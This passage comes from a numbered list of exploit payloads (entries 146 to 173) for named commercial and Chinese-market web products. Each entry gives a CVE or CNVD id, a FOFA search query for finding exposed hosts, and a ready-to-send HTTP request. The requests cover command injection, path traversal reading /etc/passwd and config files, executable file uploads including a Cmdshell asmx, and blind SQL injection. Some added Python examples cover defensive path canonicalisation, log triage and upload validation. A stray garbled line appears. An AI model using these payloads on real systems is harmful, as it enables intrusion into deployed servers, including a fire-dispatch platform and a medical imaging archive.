The cookie value becomes a file name under the device-telemetry directory; the backticked command runs when the telemetry job processes that directory, so the callback may lag the request.

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

url is base64 (rtsp://a); transport URL-decodes to || (echo '[S]'; id; echo '[E]')#; so the output of id appears between the [S] and [E] markers.

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass and template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

The ;swagger-ui/ segment is what gets the request past the authentication filter (the filter exempts Swagger paths while the framework routes on the normalised path); validationRules is then evaluated as script on the server, so the ProcessBuilder call runs and its output is returned.

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip
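Entries 149 to 151, like the CVE-2024-27199 paths in entry 132, get past an authentication filter because the filter inspects the raw request URI while the framework routes on a normalised one: `;swagger-ui` is a matrix parameter that gets stripped before routing, `%3B` is the same thing percent-encoded, and `/res/../admin/` collapses to `/admin/`. The code below is an added example, not AJ-Report's or TeamCity's, contrasting a substring-style public-path check with one that canonicalises the path before deciding. The list of public prefixes is an assumption for the example.

```python
import posixpath
import re
from urllib.parse import unquote

# Assumed allow-list of paths reachable without a session.
PUBLIC_PREFIXES = ("/swagger-ui", "/login", "/res", "/.well-known")


def weak_is_public(raw_uri: str) -> bool:
    """The bypassable pattern: substring / raw-prefix tests on the URI as sent."""
    return "swagger-ui" in raw_uri or raw_uri.startswith(("/login", "/res/", "/.well-known/"))


def canonical_path(raw_uri: str) -> str:
    """Reduce a request URI to the path the framework will actually route on."""
    path = raw_uri.split("?", 1)[0].split("#", 1)[0]
    # Percent-decode until stable (bounded), so %3B and %253B both become ";".
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    # Drop matrix parameters: "verification;swagger-ui" -> "verification",
    # and a bare ";swagger-ui" segment -> "" (collapsed below).
    path = "/".join(segment.split(";", 1)[0] for segment in path.split("/"))
    path = re.sub(r"/+", "/", path)   # normpath keeps a leading "//", so collapse first
    if not path.startswith("/"):
        path = "/" + path
    return posixpath.normpath(path)   # resolves "." and ".."


def strict_is_public(raw_uri: str) -> bool:
    """Canonicalise first, then require a match on a whole path segment."""
    path = canonical_path(raw_uri)
    return any(path == p or path.startswith(p + "/") for p in PUBLIC_PREFIXES)
```

The durable fix is not a better normaliser in the filter but making the filter and the router look at the same path object (in a servlet container, the servlet path the framework itself matched), and denying by default anything that does not match an explicit public route.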

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
Affected:
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter, so the injected shell command travels in the username half of the Basic credentials.
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip
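Three requests in this list hide their payload in base64: entry 122 puts the SQL in the sql query parameter, entry 144 puts the shell command in the system parameter, and entry 152 puts the injected command in the username half of a Basic Authorization header. None of that is encryption, so a log-triage step can simply decode and look. The function below is an added example (not any vendor's or tool's code) that decodes base64-shaped query values and Basic credentials and tags the ones that decode to SQL or shell content. The signature lists are deliberately small and are an assumption to tune; a password containing `;` or `$(` will also trip the shell tag, which is the intended trade-off for a triage filter.

```python
import base64
import binascii
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qsl, urlsplit

# A value is worth decoding if it is made only of base64 alphabet characters
# (padding optional: the D-Link passwd value above is sent unpadded).
_B64_SHAPE = re.compile(r"^[A-Za-z0-9+/]{2,}={0,2}$")
# Deliberately small signature sets; extend for your environment.
_SQL_SIG = re.compile(
    r"\b(?:select|union|insert|update|delete|sleep|updatexml|extractvalue)\b"
    r"|database\(\)|version\(\)", re.IGNORECASE)
_SHELL_SIG = re.compile(
    r"[;|`]|\$[({]|\b(?:id|ls|cat|wget|curl|sh|bash|nc)\b")


def decode_if_base64(value: str) -> Optional[str]:
    """Return the decoded UTF-8 text if `value` is valid base64, else None."""
    if not _B64_SHAPE.match(value):
        return None
    padded = value + "=" * (-len(value) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None   # random-looking tokens almost never survive both steps


def classify(text: str) -> List[str]:
    tags = []
    if _SQL_SIG.search(text):
        tags.append("sql")
    if _SHELL_SIG.search(text):
        tags.append("shell")
    return tags


def triage_request(target: str, headers: Dict[str, str]) -> List[Tuple[str, str, List[str]]]:
    """Decode base64-shaped query values and Basic credentials in one request.

    Returns (location, decoded_text, tags) for every field that decodes to
    something carrying SQL or shell content; an empty list means nothing found.
    """
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = decode_if_base64(value)
        if decoded is not None:
            tags = classify(decoded)
            if tags:
                findings.append(("query:" + name, decoded, tags))
    auth = headers.get("Authorization", "")
    if auth[:6].lower() == "basic ":
        decoded = decode_if_base64(auth[6:].strip())
        if decoded is not None:
            tags = classify(decoded)
            if tags:
                findings.append(("header:Authorization", decoded, tags))
    return findings
```

Run it over the request line and header map of each access-log record; anything it returns is worth a human look, because legitimate clients do not send SQL statements or shell metacharacters inside base64 fields.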

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: have the server copy /etc/passwd into a temporary file in its cache
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: fetch the cached copy at the path returned by step 2
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianweier (天维尔) fire and rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
PostgreSQL time-based blind injection (PG_SLEEP(5)) in the gsdwid field of the JSON body.
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
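Entries 131, 134, 135, 137 to 141 and 154 are blind injections of two kinds: time-based (SLEEP(n) for MySQL, PG_SLEEP(n) for PostgreSQL) and error-based (updatexml / extractvalue). When one of them shows up in a web log, the responder's question is not just "was it attempted" but "did it work", and for the time-based ones the log already holds the answer in the response time. The function below is an added example, not from any of the vendors above, that URL-decodes the request target and body, pulls out the requested delay and compares it with the observed latency against a per-endpoint baseline. The records and latencies are constructed; the 80 percent jitter allowance and the 120 ms baseline are assumptions.

```python
import re
from typing import Dict, Optional
from urllib.parse import unquote_plus

# Time-based signatures (MySQL SLEEP, PostgreSQL PG_SLEEP) capture the delay;
# error-based ones only tell us an attempt was made.
_TIME_SIG = re.compile(r"\b(?:PG_)?SLEEP\s*\(\s*(\d+(?:\.\d+)?)\s*\)", re.IGNORECASE)
_ERROR_SIG = re.compile(r"\b(?:updatexml|extractvalue)\s*\(", re.IGNORECASE)


def decode_layers(text: str, rounds: int = 3) -> str:
    """URL-decode repeatedly (bounded) so %2527 and %27 both end up as a quote."""
    for _ in range(rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def assess_sqli_attempt(record: Dict[str, object], baseline_ms: float) -> Optional[Dict[str, object]]:
    """Classify one access-log record.

    record: {"target": request path plus query, "body": request body or "",
             "latency_ms": observed response time}
    Returns None when no injection signature is present; otherwise the attack
    type and, for time-based attempts, whether the observed extra latency
    matches the requested sleep (the sign that the injected SQL executed).
    """
    haystack = decode_layers(str(record["target"])) + "\n" + decode_layers(str(record.get("body", "")))
    time_match = _TIME_SIG.search(haystack)
    if time_match:
        requested_s = float(time_match.group(1))
        extra_s = (float(record["latency_ms"]) - baseline_ms) / 1000.0
        executed = extra_s >= 0.8 * requested_s   # allow some jitter
        return {"type": "time-based",
                "requested_delay_s": requested_s,
                "observed_extra_s": round(extra_s, 3),
                "verdict": "likely executed" if executed else "attempted, no delay observed"}
    if _ERROR_SIG.search(haystack):
        return {"type": "error-based",
                "verdict": "attempted; check the response body for the leaked value"}
    return None


# Constructed records modelled on the requests in this list.
SAMPLE_RECORDS = [
    {"target": "/api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF",
     "body": "", "latency_ms": 5230},
    {"target": "/twms-service-mfs/mfsNotice/page",
     "body": "{\"currentPage\":1,\"query\":{\"gsdwid\":\"1f95') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi\"}}",
     "latency_ms": 140},
    {"target": "/protocol/index.php",
     "body": "jsoncontent=%7B%22protocolType%22%3A%22addmacbind%22%2C%22IPAddr%22%3A%22eth0'and(updatexml(1,concat(0x7e,(select+version())),1))%3D'%22%7D",
     "latency_ms": 130},
    {"target": "/api/client/down_file.php?uuid=7f3c", "body": "", "latency_ms": 118},
]

if __name__ == "__main__":
    for rec in SAMPLE_RECORDS:
        print(rec["target"][:40], "->", assess_sqli_attempt(rec, baseline_ms=120.0))
```

The baseline must come from the same endpoint's normal latency, and a delay can also come from an upstream WAF or proxy timing out, so "likely executed" is a prioritisation signal, not proof; the error-based cases need the response body, which most access logs do not keep.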

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
The server renames the file but keeps the client-supplied .php extension, which is why the upload is executable.
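Entries 121, 124, 130, 133, 155 and 157 share one root cause: the server takes the client's file name (or, in 124, a path parameter) and writes the bytes somewhere they are served as code. Entry 155 even renames the file but keeps the .php extension, and entries 130 and 155 send Content-Type: image/png with a PHP body, which shows that the declared type is no obstacle because that header is client-controlled too. The validator below is an added example, none of these vendors' code, of the server-side checks an upload handler needs: an extension allow-list, a magic-byte check on the content instead of trust in Content-Type, a scan for script markers inside otherwise valid images, and a server-generated name. Storing the result outside the web root, or where the web server will not execute it, is the part code cannot show here and is assumed. The PNG header and payload bodies are constructed.

```python
import os
import re
import secrets
from typing import Tuple

# Allow-list keyed by extension, each with the leading bytes a genuine file of
# that type must start with. Anything not listed is refused.
ALLOWED_TYPES = {
    "png":  (b"\x89PNG\r\n\x1a\n",),
    "jpg":  (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif":  (b"GIF87a", b"GIF89a"),
}
# Server-side script markers that have no place inside an image (polyglots).
_SCRIPT_MARKERS = re.compile(rb"<\?php|<\?=|<%|<script", re.IGNORECASE)


def validate_upload(client_filename: str, client_content_type: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, new_server_filename_or_reason).

    client_content_type is taken as a parameter only to make the point that it
    is deliberately ignored: the client chose it, so it proves nothing.
    """
    del client_content_type
    # Keep only the final path component: "../../x.png" and "C:\\x.png" both become "x.png".
    name = os.path.basename(client_filename.replace("\\", "/"))
    if not name or "\x00" in name:
        return False, "rejected: empty filename or NUL byte"
    if "." not in name:
        return False, "rejected: no extension"
    ext = name.rsplit(".", 1)[1].lower()      # last extension wins: "shell.php.png" -> "png"
    if ext not in ALLOWED_TYPES:
        return False, "rejected: extension '%s' not in allow-list" % ext
    if not data.startswith(ALLOWED_TYPES[ext]):
        return False, "rejected: content does not match a %s file" % ext
    if _SCRIPT_MARKERS.search(data):
        return False, "rejected: script marker inside image data"
    # Never reuse the client's name: a random name defeats path tricks and
    # keeps the stored location unguessable.
    return True, "%s.%s" % (secrets.token_hex(16), ext)


# Constructed inputs: a minimal (truncated) PNG header standing in for a real
# image; the PHP and JSP bodies used in the tests come from the requests above.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\rIHDR" + b"\x00" * 17
```

The order of the checks matters little for security but a lot for logging: an extension rejection, a magic mismatch and a polyglot hit are three different attacker behaviours, and keeping them distinct in the reason string makes the upload log useful for detection.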

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
Affected:
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

The mdc value above URL-decodes to: echo; echo asrgkjh0 > /var/example.txt; ls -l /var; echo ----------------; cat /var/example.txt;
1 ~ d5 q% [$ z) Z6 C
157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) medical image archiving and communication system WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>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</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 smart parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 (LVS) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

